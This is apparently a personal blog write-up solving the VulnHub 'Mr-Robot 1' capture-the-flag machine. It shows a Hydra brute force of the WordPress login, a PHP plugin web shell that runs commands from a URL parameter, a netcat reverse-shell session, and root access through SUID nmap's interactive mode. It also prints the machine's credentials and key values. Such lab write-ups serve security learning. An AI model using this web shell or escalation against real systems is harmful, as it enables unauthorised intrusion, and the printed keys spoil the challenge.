15 September 2019
by th3-3inst3in

Mr-Robot 1


Mr-Robot 1

The vulnhub page says we need to find 3 keys so lets get started

Started off with nmap and found 2 open ports

On port 80 I saw the following page I did go through all the options / commands listed but it wasn’t anything just videos and pictures.

main page

I ran dirsearch and found robots.txt in which I manage to find key 1

key 1 or 3


The other file fsociety.dic was actually a word list which I saved it for later use.

Looking at the dirsearcher results found out that the webserver was actually running wordpress. I used wpscan didn’t find anything usefull and was stuck for a while.

Then I thought to use the wordlist to try to bruteforce the login. Since I have watched Mr robot the first username that came in my mind was Mr.robot I used that as a username but didn’t find anything then I use “Elliot” as a username and bruteforced the login with hydra and voila!

Elliot and the password ER28-0652!

Logged in to the dashboard of wordpress


from here we can uplaod a simple plugin to get a shell

zip the following php code

Plugin Name: Shell
Plugin URI: https://themctfwriteups.com/shells
Description: This hacks you 
Author: th3-3inst3in
Version: 1.0.0
Author URI: https://thectfwriteups.com/

echo shell_exec($_GET['cmd']);

upload it and you get a shell using the following link



Then I got a reverse shell

nc -lvp 1337
listening on [any] 1337 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 58895
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
<ps/wordpress/htdocs/wp-content/plugins/shell.php_$ cd /home
cd /home
[email protected]:/home$ ls
[email protected]:/home$ cd robot
cd robot
[email protected]:/home/robot$ ls
key-2-of-3.txt  password.raw-md5
[email protected]:/home/robot$ ls -la
ls -la
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
[email protected]:/home/robot$ cat key-2-of-3.txt
cat key-2-of-3.txt
cat: key-2-of-3.txt: Permission denied
[email protected]:/home/robot$ cat password.raw-md5
cat password.raw-md5
[email protected]:/home/robot$ 

I cracked the password and this is what I got 

user: robot
pass: abcdefghijklmnopqrstuvwxyz

[email protected]:~$ ls  
key-2-of-3.txt  password.raw-md5
[email protected]:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
[email protected]:~$ 

key 2 of 3 822c73956184f694993bede3eb39f959

now moving on to root

Running LinEnum.sh I found the following SUID binaries


LinEnum flagged out that nmap also has SUID bit set

[email protected]:/tmp$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# cd /root
cd /root
# ls
firstboot_done  key-3-of-3.txt
# cat key-3-or-3.txt
cat key-3-or-3.txt
cat: key-3-or-3.txt: No such file or directory
# cat key-3-of-3.txt
cat key-3-of-3.txt

key 3 or 3 04787ddef27c3dee1ee161b21670b4e4

tags: ctf - vulnhub
Contact me : Twitter , Facebook